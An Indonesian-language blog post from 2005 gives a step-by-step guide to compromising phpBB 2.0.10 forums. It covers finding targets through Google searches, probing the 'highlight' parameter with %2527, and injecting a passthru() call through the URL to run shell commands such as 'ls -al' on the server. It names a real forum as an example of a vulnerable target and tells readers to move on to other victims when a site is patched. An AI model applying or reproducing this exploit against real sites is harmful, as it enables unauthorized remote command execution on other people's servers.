|
| Saturday, August 27, 2005 |
| Hacking PHPBB 2.0.10 |
hacking phpbb 2.0.10
1. Cari sasaran menggunakan paman google. keywordnya = phpbb 2.0
Jangan menggunakan keyword viewtopic karena gak akan diijinkan.
2. Kunjungi alamat forum yang didapat. Lihat dan kunjungi hingga pada bagian address tertulis
http://sasaran.com/viewtopic.php?t=4(angka 4 bisa saja lain)
3. Kemudian pada bagian address coba tambahkan &highlight=%2527
http://sasaran.com/viewtopic.php?t=4&highlight=%2527
4. Jika yang muncul adalah error, maka bererti forumnya vuln (bolong). Jika tidak, cari sasaran lain. :-)
5. Setelah Muncul error coba tambahkan lagi menjadi
http://sasaran.com/viewtopic.php?t=t=4&highlight=%2527.passthru($HTTP_GET_VARS[cmd]).%2527&cmd=ls -al
6. Jika yang muncul adalah daftar nama file dan direktori, selamat anda telah berhasil masuk ke dalam sysytem sasaran
7. Jika ada error tetapi eksekusi perintah cmd= tidak berjalan kemungkinan fungsi passthru sudah dimatikan oleh admin. Cari sasaran lain.
Contoh forum yang vuln :
http://batam.linux.or.id/forumlinux/viewtopic.php?t=19
|
posted by banjar-hack @ 10:19 AM   |
|
|
|
|
| |
| The Time |
|
|
| Previous Post |
|
| Archives |
|
| it's You? |
|
| Links |
| SecurityDownload |
| Powered by |
 |
|
